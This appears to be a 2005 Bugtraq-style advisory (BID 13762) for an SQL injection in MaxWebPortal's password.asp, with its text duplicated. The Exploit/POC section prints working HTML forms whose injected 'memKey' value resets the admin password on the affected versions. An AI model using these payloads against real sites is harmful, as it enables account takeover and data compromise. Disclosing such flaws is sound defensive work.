MaxWebPortal Password.ASP SQL Injection Vulnerability
BID:13762
Info
MaxWebPortal Password.ASP SQL Injection Vulnerability
| Bugtraq ID: | 13762 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 25 2005 12:00AM |
| Updated: | May 25 2005 12:00AM |
| Credit: | s d <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
MaxWebPortal MaxWebPortal 2.0 MaxWebPortal MaxWebPortal 1.36 MaxWebPortal MaxWebPortal 1.35 MaxWebPortal MaxWebPortal 1.33 MaxWebPortal MaxWebPortal 1.32 MaxWebPortal MaxWebPortal 1.31 MaxWebPortal MaxWebPortal 1.30 |
| Not Vulnerable: | |
Discussion
MaxWebPortal Password.ASP SQL Injection Vulnerability
MaxWebPortal is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
MaxWebPortal is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Exploit / POC
MaxWebPortal Password.ASP SQL Injection Vulnerability
No exploit is required.
Version 1.35 and older:
-----------------Code Start-----Version 1.35 and older--------------
<form action="http://[URL]/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><
br>
pass2: <input name="pass2" type="text" value="123456" size="150"><
br>
Id: <input name="memId" type="text" value="-1" size="150"><
br>
Member Key: <input name="memKey" type="text" value="foo' or M_Name='admin"
size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------
Version 1.36, 2.0, 20050418 Next:
-----------------Code Start-----Version 1.36, 2.0, 20050418 Next--------------
<form action="http://[URL]/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><
br>
pass2: <input name="pass2" type="text" value="123456" size="150"><
br>
Id: <input name="memId" type="text" value="-1" size="150"><
br>
Member Key: <input name="memKey" type="text" value="foo') or M_Name='admi
n' or ('1'='2" size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------
No exploit is required.
Version 1.35 and older:
-----------------Code Start-----Version 1.35 and older--------------
<form action="http://[URL]/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><
br>
pass2: <input name="pass2" type="text" value="123456" size="150"><
br>
Id: <input name="memId" type="text" value="-1" size="150"><
br>
Member Key: <input name="memKey" type="text" value="foo' or M_Name='admin"
size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------
Version 1.36, 2.0, 20050418 Next:
-----------------Code Start-----Version 1.36, 2.0, 20050418 Next--------------
<form action="http://[URL]/password.asp?mode=reset" method="post">
<br>
pass1: <input name="pass" type="text" value="123456" size="150"><
br>
pass2: <input name="pass2" type="text" value="123456" size="150"><
br>
Id: <input name="memId" type="text" value="-1" size="150"><
br>
Member Key: <input name="memKey" type="text" value="foo') or M_Name='admi
n' or ('1'='2" size="150">
<br>
<input name="Submit" type="submit" value="Submit">
</form>
-----------------End-------------------
Solution / Fix
MaxWebPortal Password.ASP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
MaxWebPortal Password.ASP SQL Injection Vulnerability
References:
References:
- MaxWebPortal Homepage (MaxWebPortal)